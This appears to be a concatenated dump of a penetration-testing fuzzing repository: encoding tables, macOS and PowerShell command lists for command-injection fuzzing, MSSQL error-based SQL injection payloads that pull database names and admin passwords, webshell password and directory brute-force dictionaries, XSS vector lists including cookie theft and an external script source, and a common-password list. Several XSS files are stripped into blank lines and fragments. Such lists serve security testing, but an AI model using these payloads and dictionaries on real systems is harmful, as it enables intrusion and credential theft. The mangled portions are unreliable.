39 | %25
40 | %26
41 | %27
42 | %28
43 | %29
44 | %2a
45 | %2b
46 | %2c
47 | %2d
48 | %2e
49 | %2f
50 | %30
51 | %31
52 | %32
53 | %33
54 | %34
55 | %35
56 | %36
57 | %37
58 | %38
59 | %39
60 | %3a
61 | %3b
62 | %3c
63 | %3d
64 | %3e
65 | %3f
66 | %40
67 | %41
68 | %42
69 | %43
70 | %44
71 | %45
72 | %46
73 | %47
74 | %48
75 | %49
76 | %4a
77 | %4b
78 | %4c
79 | %4d
80 | %4e
81 | %4f
82 | %50
83 | %51
84 | %52
85 | %53
86 | %54
87 | %55
88 | %56
89 | %57
90 | %58
91 | %59
92 | %5a
93 | %5b
94 | %5c
95 | %5d
96 | %5e
97 | %5f
98 | %60
99 | %61
100 | %62
101 | %63
102 | %64
103 | %65
104 | %66
105 | %67
106 | %68
107 | %69
108 | %6a
109 | %6b
110 | %6c
111 | %6d
112 | %6e
113 | %6f
114 | %70
115 | %71
116 | %72
117 | %73
118 | %74
119 | %75
120 | %76
121 | %77
122 | %78
123 | %79
124 | %7a
125 | %7b
126 | %7c
127 | %7d
128 | %7e
129 | %7f
130 | %80
131 | %81
132 | %82
133 | %83
134 | %84
135 | %85
136 | %86
137 | %87
138 | %88
139 | %89
140 | %8a
141 | %8b
142 | %8c
143 | %8d
144 | %8e
145 | %8f
146 | %90
147 | %91
148 | %92
149 | %93
150 | %94
151 | %95
152 | %96
153 | %97
154 | %98
155 | %99
156 | %9a
157 | %9b
158 | %9c
159 | %9d
160 | %9e
161 | %9f
162 | %a0
163 | %a1
164 | %a2
165 | %a3
166 | %a4
167 | %a5
168 | %a6
169 | %a7
170 | %a8
171 | %a9
172 | %aa
173 | %ab
174 | %ac
175 | %ad
176 | %ae
177 | %af
178 | %b0
179 | %b1
180 | %b2
181 | %b3
182 | %b4
183 | %b5
184 | %b6
185 | %b7
186 | %b8
187 | %b9
188 | %ba
189 | %bb
190 | %bc
191 | %bd
192 | %be
193 | %bf
194 | %c0
195 | %c1
196 | %c2
197 | %c3
198 | %c4
199 | %c5
200 | %c6
201 | %c7
202 | %c8
203 | %c9
204 | %ca
205 | %cb
206 | %cc
207 | %cd
208 | %ce
209 | %cf
210 | %d0
211 | %d1
212 | %d2
213 | %d3
214 | %d4
215 | %d5
216 | %d6
217 | %d7
218 | %d8
219 | %d9
220 | %da
221 | %db
222 | %dc
223 | %dd
224 | %de
225 | %df
226 | %e0
227 | %e1
228 | %e2
229 | %e3
230 | %e4
231 | %e5
232 | %e6
233 | %e7
234 | %e8
235 | %e9
236 | %ea
237 | %eb
238 | %ec
239 | %ed
240 | %ee
241 | %ef
242 | %f0
243 | %f1
244 | %f2
245 | %f3
246 | %f4
247 | %f5
248 | %f6
249 | %f7
250 | %f8
251 | %f9
252 | %fa
253 | %fb
254 | %fc
255 | %fd
256 | %fe
257 | %ff
258 |
--------------------------------------------------------------------------------
/操作系统命令执行/OSXCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | alias
2 | alloc
3 | apropos
4 | awk
5 | basename
6 | bash
7 | bg
8 | bind
9 | bless
10 | break
11 | builtin
12 | bzip
13 | cal
14 | caller
15 | case
16 | cat
17 | cd
18 | chflags
19 | chgrp
20 | chmod
21 | chown
22 | chroot
23 | cksum
24 | clear
25 | cmp
26 | comm
27 | command
28 | complete
29 | continue
30 | cp
31 | cron
32 | crontab
33 | curl
34 | cut
35 | date
36 | dc
37 | dd
38 | declare
39 | defaults
40 | df
41 | diff
42 | diff3
43 | dig
44 | dirname
45 | dirs
46 | diskutil
47 | disown
48 | ditto
49 | dot_clean
50 | drutil
51 | dscacheutil
52 | dscl
53 | du
54 | echo
55 | ed
56 | enable
57 | env
58 | eval
59 | exec
60 | exit
61 | expand
62 | expect
63 | export
64 | expr
65 | false
66 | fc
67 | fdisk
68 | fg
69 | file
70 | find
71 | fmt
72 | fold
73 | for
74 | fsck
75 | fsaclctl
76 | fs_usage
77 | ftp
78 | GetFileInfo
79 | getopt
80 | getopts
81 | goto
82 | grep
83 | groups
84 | gzip
85 | hash
86 | head
87 | hdiutil
88 | history
89 | hostname
90 | id
91 | if
92 | info
93 | install
94 | jobs
95 | join
96 | kextfind
97 | kickstart
98 | kill
99 | l
100 | last
101 | launchctl
102 | ll
103 | less
104 | let
105 | lipo
106 | ln
107 | local
108 | locate
109 | logname
110 | login
111 | logout
112 | lpr
113 | lprm
114 | lpstat
115 | ls
116 | lsregister
117 | lsbom
118 | lsof
119 | man
120 | mdfind
121 | mdutil
122 | mkdir
123 | mkfifo
124 | more
125 | mount
126 | mv
127 | net
128 | netstat
129 | networksetup
130 | nice
131 | nohup
132 | ntfs.util
133 | onintr
134 | open
135 | opensnoop
136 | osacompile
137 | osascript
138 | passwd
139 | paste
140 | pbcopy
141 | pbpaste
142 | pico
143 | ping
144 | pkgutil
145 | plutil
146 | pmset
147 | popd
148 | pr
149 | printenv
150 | printf
151 | ps
152 | pushd
153 | pwd
154 | quota
155 | rcp
156 | read
157 | readonly
158 | reboot
159 | return
160 | rev
161 | rm
162 | rmdir
163 | rpm
164 | rsync
165 | say
166 | screen
167 | screencapture
168 | sdiff
169 | security
170 | sed
171 | select
172 | set
173 | setfile
174 | shift
175 | shopt
176 | shutdown
177 | sips
178 | sleep
179 | softwareupdate
180 | sort
181 | source
182 | split
183 | stop
184 | su
185 | sudo
186 | sum
187 | suspend
188 | sw_vers
189 | system_profiler
190 | systemsetup
191 | tail
192 | tar
193 | tee
194 | test
195 | textutil
196 | time
197 | times
198 | top
199 | touch
200 | tr
201 | trap
202 | traceroute
203 | true
204 | tty
205 | type
206 | ufs.util
207 | ulimit
208 | umask
209 | umount
210 | unalias
211 | uname
212 | unexpand
213 | uniq
214 | units
215 | unset
216 | until
217 | users
218 | uuencode
219 | uudecode
220 | uuidgen
221 | uucp
222 | vi
223 | wait
224 | wc
225 | whatis
226 | where
227 | which
228 | while
229 | who
230 | whoami
231 | write
232 | xargs
233 | yes
234 |
--------------------------------------------------------------------------------
/SQL注入测试/MSSQL/MS-SQL.txt:
--------------------------------------------------------------------------------
1 | convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
2 | convert(int,user COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
3 | convert(int,system_user COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
4 | convert(int,host_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
5 | convert(int,@@SERVERNAME COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
6 | convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
7 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count([name]) as nvarchar(4000)) from [master]..[sysdatabases] )%2bchar(82)%2bchar(72))) and 1=1
8 | convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=N)) and 1=1
9 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables )%2bchar(82)%2bchar(72))) and 1=1
10 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top N table_name from information_schema.tables order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
11 | convert(int,(char(126)%2b(select distinct top 1 column_name from (select distinct top N column_name from information_schema.columns where table_name= order BY column_name ASC) sq order BY column_name DESC)%2bchar(126))) and 1=1
12 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from [TableName] )%2bchar(82)%2bchar(72))) and 1=1
13 | convert(int,(char(72)%2bchar(82)%2b(select top 1 isnull([PASSWD],char(126))%2bchar(94)%2bisnull([USERNAME],char(126)) from (select top 1 [PASSWD],[USERNAME] from [Admin] order by [PASSWD] asc) sq order by [PASSWD] desc)%2bchar(82)%2bchar(72))) and 1=1
14 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top N table_name from DatabaseName.OwnerName.ObjectORtableName order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
15 | convert(int,(char(126)%2b(select distinct top 1 table_name from (select distinct top 1 table_name from logosoft.information_schema.tables order BY table_name ASC) sq order BY table_name DESC)%2bchar(126))) and 1=1
16 | convert(int,(char(126)%2b(select distinct top 1 column_name from (select distinct top N column_name from DatabaseName.OwnerName.ObjectORColumnName where table_name= order BY column_name ASC) sq order BY column_name DESC)%2bchar(126))) and 1=1
17 | convert(int,(char(72)%2bchar(82)%2b(select top 1 cast(count(*) as nvarchar(4000)) from [DatabaseName]..[TableName] )%2bchar(82)%2bchar(72))) and 1=1
18 | convert(int,(char(82)%2bchar(33)%2b(select top 1 isnull([ColumnName],char(32)) from (select top 1 [ColumnName] from [DatabaseName]..[TableName] order by [ColumnName] asc) sq order by [ColumnName] desc)%2bchar(33)%2bchar(82))) and 1=1
--------------------------------------------------------------------------------
/Password dictionary/200多个文件名.dict:
--------------------------------------------------------------------------------
1 | a
2 | about
3 | aboutus
4 | addUser
5 | admin
6 | administration
7 | admins
8 | ads
9 | advertise
10 | app
11 | archive
12 | archives
13 | arrow
14 | article
15 | articles
16 | at
17 | atom
18 | b
19 | backup
20 | banner
21 | banners
22 | blank
23 | blog
24 | blogs
25 | books
26 | business
27 | buttons
28 | calc
29 | calendar
30 | careers
31 | category
32 | cgi-bin
33 | changepass
34 | changepasswd
35 | changepassword
36 | changepwd
37 | chgpass
38 | chgpasswd
39 | chgpassword
40 | chgpwd
41 | chpass
42 | chpasswd
43 | chpassword
44 | chpwd
45 | clients
46 | comments
47 | common
48 | community
49 | company
50 | contact
51 | contactus
52 | content
53 | copyright
54 | crack
55 | cron
56 | data
57 | default
58 | dir
59 | directory
60 | docs
61 | download
62 | downloads
63 | education
64 | email
65 | en
66 | english
67 | etc
68 | events
69 | faq
70 | features
71 | feed
72 | feedback
73 | file
74 | files
75 | foot
76 | footer
77 | forum
78 | forums
79 | frame1
80 | frame2
81 | framemain
82 | ftp
83 | full
84 | gallery
85 | games
86 | go
87 | graphics
88 | head
89 | header
90 | help
91 | history
92 | home
93 | html
94 | i
95 | icons
96 | image
97 | images
98 | img
99 | in
100 | index
101 | info
102 | internet
103 | jobs
104 | keygen
105 | legal
106 | lib
107 | library
108 | links
109 | linux
110 | list
111 | log
112 | login
113 | logo
114 | logoff
115 | logon
116 | logos
117 | logout
118 | main
119 | mainframe
120 | media
121 | menu
122 | menuitem
123 | misc
124 | modules
125 | music
126 | nav
127 | new
128 | newpass
129 | newpasswd
130 | newpassword
131 | newpw
132 | news
133 | newsletter
134 | newUser
135 | page
136 | pages
137 | papers
138 | partners
139 | pass
140 | passwd
141 | passwd.adjunct
142 | password
143 | passwords
144 | pdf
145 | people
146 | photos
147 | press
148 | print
149 | privacy
150 | product
151 | products
152 | profile
153 | projects
154 | pub
155 | publications
156 | pwd
157 | ref
158 | register
159 | research
160 | resources
161 | reviews
162 | robots
163 | rss
164 | s
165 | sample
166 | search
167 | secret
168 | security
169 | serial
170 | services
171 | setpass
172 | setpasswd
173 | setpassword
174 | setpwd
175 | shared
176 | site
177 | sitemap
178 | software
179 | spacer
180 | spam
181 | sports
182 | stats
183 | store
184 | stories
185 | story
186 | submit
187 | subscribe
188 | support
189 | system
190 | technology
191 | templates
192 | terms
193 | themes
194 | tools
195 | top
196 | uploads
197 | user
198 | users
199 | video
200 | view
201 | warez
202 | web
203 | welcome
204 | wiki
205 | www
206 | xml
207 | 0
208 | 1
209 | 2
210 | 2007
211 | 2008
212 | 2009
213 | 2010
214 | 3
215 | 4
216 | 5
217 | 6
218 | 7
219 | 8
220 | 9
221 |
--------------------------------------------------------------------------------
/操作系统命令执行/WindowsPowershell.fuzz.txt:
--------------------------------------------------------------------------------
1 | get-acl
2 | set-acl
3 | get-alias
4 | import-alias
5 | new-alias
6 | set-alias
7 | get-authenticodesignature
8 | set-authenticodesignature
9 | set-location
10 | get-childitem
11 | get-command
12 | measure-command
13 | trace-command
14 | add-content
15 | get-content
16 | set-content
17 | clear-content
18 | convertto-html
19 | convertfrom-securestring
20 | convertto-securestring
21 | clear-host
22 | clear-item
23 | copy-item
24 | get-credential
25 | get-childitem
26 | get-date
27 | set-date
28 | remove-item
29 | do
30 | get-psdrive
31 | new-psdrive
32 | remove-psdrive
33 | get-eventlog
34 | get-executionpolicy
35 | set-executionpolicy
36 | export-alias
37 | export-clixml
38 | export-console
39 | export-csv
40 | invoke-expression
41 | exit
42 | foreach-object
43 | foreach
44 | for
45 | format-custom
46 | format-list
47 | format-table
48 | format-wide
49 | get-item
50 | get-childitem
51 | get-help
52 | add-history
53 | get-history
54 | invoke-history
55 | get-host
56 | clear-host
57 | read-host
58 | write-host
59 | if
60 | import-clixml
61 | import-csv
62 | get-item
63 | invoke-item
64 | new-item
65 | remove-item
66 | set-item
67 | clear-itemproperty
68 | copy-itemproperty
69 | get-itemproperty
70 | move-itemproperty
71 | new-itemproperty
72 | remove-itemproperty
73 | rename-itemproperty
74 | set-itemproperty
75 | stop-process
76 | get-location
77 | pop-location
78 | push-location
79 | set-location
80 | add-member
81 | get-member
82 | move-item
83 | compare-object
84 | group-object
85 | measure-object
86 | new-object
87 | select-object
88 | sort-object
89 | where-object
90 | out-default
91 | out-file
92 | out-host
93 | out-null
94 | out-printer
95 | out-string
96 | powershell
97 | convert-path
98 | join-path
99 | resolve-path
100 | split-path
101 | test-path
102 | get-pfxcertificate
103 | pop-location
104 | push-location
105 | get-process
106 | stop-process
107 | clear-itemproperty
108 | copy-itemproperty
109 | get-itemproperty
110 | move-itemproperty
111 | new-itemproperty
112 | remove-itemproperty
113 | rename-itemproperty
114 | set-itemproperty
115 | get-psprovider
116 | set-psdebug
117 | add-pssnapin
118 | get-pssnapin
119 | remove-pssnapin
120 | quest
121 | read-host
122 | remove-item
123 | rename-item
124 | rename-itemproperty
125 | run/call
126 | select-object
127 | get-service
128 | new-service
129 | restart-service
130 | resume-service
131 | set-service
132 | sort-object
133 | start-service
134 | stop-service
135 | suspend-service
136 | start-sleep
137 | switch
138 | select-string
139 | tee-object
140 | new-timespan
141 | trace-command
142 | get-tracesource
143 | set-tracesource
144 | start-transcript
145 | stop-transcript
146 | get-uiculture
147 | get-unique
148 | update-formatdata
149 | update-typedata
150 | clear-variable
151 | get-variable
152 | new-variable
153 | remove-variable
154 | set-variable
155 | where-object
156 | where
157 | while
158 | get-wmiobject
159 | write-debug
160 | write-error
161 | write-output
162 | write-progress
163 | write-verbose
164 | write-warning
165 |
--------------------------------------------------------------------------------
/Password dictionary/224条webshell密码.dict:
--------------------------------------------------------------------------------
1 | !@#123
2 | *******
3 | 000
4 | 1
5 | 10011C120105101
6 | 111
7 | 12
8 | 123
9 | 123!@#
10 | 123321
11 | 12345
12 | 123456
13 | 123654
14 | 123654789
15 | 123654789!
16 | 123654789.
17 | 123go
18 | 1314520
19 | 133135136
20 | 13572468
21 | 19880118
22 | 1992724
23 | 20080808
24 | 3452510
25 | 360
26 | 360sb
27 | 376186027
28 | 3est
29 | 45189946
30 | 4816535
31 | 4lert
32 | 4ngel
33 | 520
34 | 52013
35 | 5201314
36 | 5201314
37 | 520hack
38 | 521
39 | 535039
40 | 54321
41 | 584521
42 | 654321
43 | 654321
44 | 80sec
45 | 847381979
46 | 847381979
47 | 888999
48 | 96315001
49 | 981246
50 | admin
51 | admin888
52 | aiezu
53 | air
54 | angel
55 | aoyunhui
56 | asp
57 | aspadmin
58 | aspxadmin
59 | axiao
60 | baidu
61 | baiduadmin
62 | baidusb
63 | Baike
64 | bzxyd
65 | bzxyd
66 | C
67 | caodan
68 | caonima
69 | caonimade
70 | caonimadebi
71 | caonimei
72 | cc
73 | ceshi2009
74 | chengnuo
75 | chenxue
76 | chinared
77 | chuang
78 | cmdshell
79 | cms
80 | cnot
81 | dangdang
82 | danteng
83 | dantong
84 | daohao
85 | daoke
86 | daoker
87 | daokers
88 | daoqq
89 | darkst
90 | dreamh
91 | et520
92 | Evav
93 | evil
94 | evilhack
95 | evilhacker
96 | evilhk
97 | F.S.T
98 | f19ht
99 | fclshark
100 | fight
101 | fst
102 | fuck
103 | fucker
104 | fuckhack
105 | fuckhacker
106 | fuckit
107 | FuckYou
108 | G.xp
109 | ghost
110 | ghost
111 | gxp
112 | h4ck
113 | h4ck3r
114 | hack
115 | hack520
116 | hacker
117 | hackersb
118 | hackqingshu
119 | hacksb
120 | hake
121 | hakecc
122 | haode
123 | heixiaozi
124 | hkk007
125 | hkmjj
126 | hkmm
127 | hongker
128 | honker
129 | HqzX
130 | huaidan
131 | iamnotadmin
132 | iloveshell
133 | jcksyes
134 | jiaozhu
135 | jiaozu
136 | jing
137 | jinjin
138 | jspadmin
139 | jtk2352
140 | kill
141 | kissy
142 | lcx
143 | lengfeng
144 | lengfengsk
145 | lengxue
146 | lin
147 | liner
148 | login
149 | love
150 | lovehack7758
151 | lover
152 | loveshell
153 | lunnijie
154 | lx
155 | maek
156 | mama
157 | mama520
158 | nc
159 | noadmin
160 | nohack
161 | noid
162 | ouou
163 | phpadmin
164 | qingshu
165 | qingshu$
166 | r4sky
167 | rensheng
168 | rfkl
169 | rinima
170 | rs
171 | rusuan
172 | sa
173 | sadness
174 | sasa
175 | Satan
176 | sb
177 | sb360
178 | sh3ll
179 | shaomo
180 | shell
181 | shunzi
182 | sin
183 | spider
184 | sq19880602
185 | sunzi
186 | sz
187 | T00ls
188 | tag
189 | tengxin
190 | tengxunsb
191 | tig
192 | tiger
193 | tonecan
194 | tx
195 | ufo
196 | ufohack
197 | username
198 | webadmin
199 | webadmin2
200 | WebShell
201 | whatweb
202 | windows
203 | winner
204 | wocaonima
205 | worinima
206 | wrsk
207 | wrsky
208 | wuzheng
209 | wwwhakecc
210 | xiaoe
211 | xiaowu
212 | xiaoyi
213 | xxoxx
214 | xxxxx
215 | ying
216 | yong
217 | youaresb
218 | youguest
219 | yrpx
220 | yuemo
221 | yushiwuzheng
222 | yy
223 | yyswxws
224 | zhack
225 | zzzzzz
226 | mm
227 | yjh
--------------------------------------------------------------------------------
/XSS测试/docs.wasc-scriptmapping/license.txt:
--------------------------------------------------------------------------------
1 | Guest Articles Content License
2 | Terms and Conditions for Copying, Distributing, and Modifying
3 |
4 | Items other than copying, distributing, and modifying the Content with
5 | which this license was distributed (such as using, etc.) are outside the
6 | scope of this license.
7 |
8 | 1. You may copy and distribute exact replicas of the OpenContent (OC) as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the OC a copy of this License along with the OC. You may at your option charge a fee for the media and/or handling involved in creating a unique copy of the OC for use offline, you may at your option offer instructional support for the OC in exchange for a fee, or you may at your option offer warranty in exchange for a fee. You may not charge a fee for the OC itself. You may not charge a fee for the sole service of providing access to and/or use of the OC via a network (e.g. the Internet), whether it be via the world wide web, FTP, or any other method.
9 |
10 | 2. You may modify your copy or copies of the OpenContent or any portion of it, thus forming works based on the Content, and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
11 |
12 | a) You must cause the modified content to carry prominent notices stating that you changed it, the exact nature and content of the changes, and the date of any change.
13 |
14 | b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the OC or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License, unless otherwise permitted under applicable Fair Use law.
15 |
16 | These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the OC, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the OC, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Exceptions are made to this requirement to release modified works free of charge under this license only in compliance with Fair Use law where applicable.
17 |
18 | 3. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to copy, distribute or modify the OC. These actions are prohibited by law if you do not accept this License. Therefore, by distributing or translating the OC, or by deriving works herefrom, you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or translating the OC.
19 |
20 | NO WARRANTY
21 |
22 | 4. BECAUSE THE OPENCONTENT (OC) IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE OC, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE OC "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK OF USE OF THE OC IS WITH YOU. SHOULD THE OC PROVE FAULTY, INACCURATE, OR OTHERWISE UNACCEPTABLE YOU ASSUME THE COST OF ALL NECESSARY REPAIR OR CORRECTION.
23 |
24 | 5. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MIRROR AND/OR REDISTRIBUTE THE OC AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE OC, EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
25 |
26 |
--------------------------------------------------------------------------------
/XSS测试/XSSvectorCHECK.txt:
--------------------------------------------------------------------------------
1 | ')alert('xss');
2 | ");alert('xss');
3 | XSS DETECTED by HR .html
4 |
5 |
6 | <0x736372697074>alert('XSS')0x736372697074>
7 | alert('XSS')
8 | <0x736372697074>alert(String.fromCharCode(88, 83, 83))0x736372697074>
9 | alert(String.fromCharCode(88, 83, 83))
10 |
11 | ">XSS DETECTED by HR .html
12 | ">
13 | ">
14 | "><0x736372697074>alert('XSS')0x736372697074>
15 | ">alert('XSS')
16 | "><0x736372697074>alert(String.fromCharCode(88, 83, 83))0x736372697074>
17 | ">alert(String.fromCharCode(88, 83, 83))
18 | ">
19 | %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
20 | "><script>alert('XSS')</script>
21 | "><script>alert('XSS')</script>
22 | Ij48c2NyaXB0PmFsZXJ0KCdYU1MnKTwvc2NyaXB0Pg==
23 |
24 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//\";alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 72, 82))//-->">'>
25 | <
26 |
28 | \";alert('XSS');//
29 |
30 |
31 |
32 |
33 | ">
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 | ))
46 | )
47 | )
48 | )
49 |
50 |
51 |
52 |
53 |
54 | %3Cscript%3alert(document.cookie);%3C%2Fscript%3
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
/XSS测试/xss-rsnake.txt:
--------------------------------------------------------------------------------
1 | # credit to rsnake
2 |
3 | '';!--" =&{()}
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | SRC=
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
66 |
67 | echo('
69 | +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
70 |
71 |
72 |
73 |
74 | PT SRC="http://ha.ckers.org/xss.js">
75 |
--------------------------------------------------------------------------------
/Password dictionary/400多个目录.dict:
--------------------------------------------------------------------------------
1 | a
2 | about
3 | access
4 | account
5 | accounting
6 | activex
7 | admin
8 | administration
9 | administrator
10 | adminuser
11 | Album
12 | apache
13 | app
14 | appl
15 | applets
16 | application
17 | applications
18 | apply
19 | apps
20 | archive
21 | archives
22 | article
23 | articles
24 | auth
25 | author
26 | authors
27 | b
28 | backup
29 | backups
30 | beta
31 | bin
32 | binaries
33 | binary
34 | blog
35 | browse
36 | buy
37 | c
38 | cart
39 | catalog
40 | category
41 | cbi-bin
42 | ccards
43 | cert
44 | certificate
45 | cgi
46 | cgi-bin
47 | class
48 | client
49 | clients
50 | code
51 | com
52 | comments
53 | common
54 | comp
55 | company
56 | compressed
57 | conf
58 | config
59 | configs
60 | connect
61 | contact
62 | contacts
63 | contactus
64 | content
65 | core
66 | crack
67 | credit
68 | cust
69 | custom
70 | customer
71 | customers
72 | data
73 | database
74 | databases
75 | datafiles
76 | db
77 | debug
78 | default
79 | delete
80 | demo
81 | demos
82 | demouser
83 | dev
84 | devel
85 | development
86 | dir
87 | directories
88 | directory
89 | doc
90 | doc-html
91 | docs
92 | document
93 | documentation
94 | documents
95 | download
96 | downloads
97 | e
98 | email
99 | employees
100 | en
101 | enter
102 | error
103 | errors
104 | events
105 | example
106 | examples
107 | exit
108 | export
109 | external
110 | extranet
111 | f
112 | faq
113 | features
114 | files
115 | find
116 | flash
117 | form
118 | forms
119 | forum
120 | ftp
121 | full
122 | fun
123 | function
124 | g
125 | general
126 | global
127 | globals
128 | graphics
129 | guest
130 | guests
131 | h
132 | help
133 | hidden
134 | home
135 | htm
136 | html
137 | i
138 | I
139 | icons
140 | idea
141 | image
142 | images
143 | img
144 | imp
145 | import
146 | inc
147 | include
148 | includes
149 | index
150 | info
151 | information
152 | install
153 | internal
154 | internet
155 | intranet
156 | inventory
157 | j
158 | js
159 | k
160 | keygen
161 | known
162 | l
163 | lib
164 | libraries
165 | library
166 | license
167 | licenses
168 | links
169 | linux
170 | local
171 | log
172 | logfile
173 | logfiles
174 | logging
175 | login
176 | logo
177 | logout
178 | logs
179 | m
180 | mail
181 | main
182 | man
183 | management
184 | manager
185 | manual
186 | map
187 | maps
188 | marketing
189 | media
190 | member
191 | members
192 | message
193 | messaging
194 | misc
195 | mod
196 | module
197 | modules
198 | n
199 | name
200 | names
201 | new
202 | news
203 | News
204 | notes
205 | o
206 | objects
207 | old
208 | oracle
209 | order
210 | orders
211 | out
212 | p
213 | page
214 | pages
215 | partner
216 | partners
217 | passport
218 | password
219 | passwords
220 | payment
221 | personal
222 | pics
223 | pictures
224 | press
225 | privacy
226 | private
227 | products
228 | profile
229 | protected
230 | proxy
231 | pub
232 | public
233 | publish
234 | purchase
235 | purchases
236 | pw
237 | q
238 | r
239 | Readme
240 | register
241 | report
242 | reports
243 | resources
244 | restricted
245 | retail
246 | reviews
247 | robot
248 | robots
249 | rss
250 | s
251 | sales
252 | save
253 | script
254 | scripts
255 | search
256 | secret
257 | secure
258 | security
259 | sell
260 | serial
261 | server
262 | service
263 | services
264 | servlet
265 | servlets
266 | session
267 | setup
268 | share
269 | shared
270 | shipping
271 | shop
272 | show
273 | site
274 | sitemap
275 | sites
276 | soap
277 | software
278 | source
279 | spacer
280 | sql
281 | src
282 | staff
283 | stat
284 | stats
285 | status
286 | store
287 | stuff
288 | style
289 | styles
290 | stylesheet
291 | stylesheets
292 | sun
293 | supplier
294 | suppliers
295 | supply
296 | support
297 | sys
298 | system
299 | systems
300 | t
301 | tar
302 | target
303 | tech
304 | temp
305 | template
306 | templates
307 | terms
308 | test
309 | testing
310 | tests
311 | themes
312 | ticket
313 | tickets
314 | tip
315 | tips
316 | tmp
317 | ToDo
318 | tool
319 | tools
320 | top
321 | u
322 | unknown
323 | updates
324 | upload
325 | uploads
326 | us
327 | usage
328 | user
329 | users
330 | usr
331 | util
332 | utils
333 | v
334 | vendor
335 | w
336 | warez
337 | web
338 | webadmin
339 | webapps
340 | word
341 | work
342 | world
343 | www
344 | wwwrooot
345 | x
346 | xml
347 | y
348 | z
349 | zip
350 | 1
351 | 2
352 | 2004
353 | 2005
354 | 2006
355 | 2007
356 | 3
357 | 4
358 | 5
359 | 6
360 | 7
361 | 8
362 | 9
363 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/passwds/twitter.txt:
--------------------------------------------------------------------------------
1 | # ripped from twitter signup page js :) (apparently the client-side list of passwords the signup form rejected as too common)
2 | 111111
3 | 11111111
4 | 112233
5 | 121212
6 | 123123
7 | 123456
8 | 1234567
9 | 12345678
10 | 131313
11 | 232323
12 | 654321
13 | 666666
14 | 696969
15 | 777777
16 | 7777777
17 | 8675309
18 | 987654
19 | aaaaaa
20 | abc123
21 | abc123
22 | abcdef
23 | abgrtyu
24 | access
25 | access14
26 | action
27 | albert
28 | alexis
29 | amanda
30 | amateur
31 | andrea
32 | andrew
33 | angela
34 | angels
35 | animal
36 | anthony
37 | apollo
38 | apples
39 | arsenal
40 | arthur
41 | asdfgh
42 | asdfgh
43 | ashley
44 | august
45 | austin
46 | badboy
47 | bailey
48 | banana
49 | barney
50 | baseball
51 | batman
52 | beaver
53 | beavis
54 | bigdaddy
55 | bigdog
56 | birdie
57 | bitches
58 | biteme
59 | blazer
60 | blonde
61 | blondes
62 | bond007
63 | bonnie
64 | booboo
65 | booger
66 | boomer
67 | boston
68 | brandon
69 | brandy
70 | braves
71 | brazil
72 | bronco
73 | broncos
74 | bulldog
75 | buster
76 | butter
77 | butthead
78 | calvin
79 | camaro
80 | cameron
81 | canada
82 | captain
83 | carlos
84 | carter
85 | casper
86 | charles
87 | charlie
88 | cheese
89 | chelsea
90 | chester
91 | chicago
92 | chicken
93 | cocacola
94 | coffee
95 | college
96 | compaq
97 | computer
98 | cookie
99 | cooper
100 | corvette
101 | cowboy
102 | cowboys
103 | crystal
104 | dakota
105 | dallas
106 | daniel
107 | danielle
108 | debbie
109 | dennis
110 | diablo
111 | diamond
112 | doctor
113 | doggie
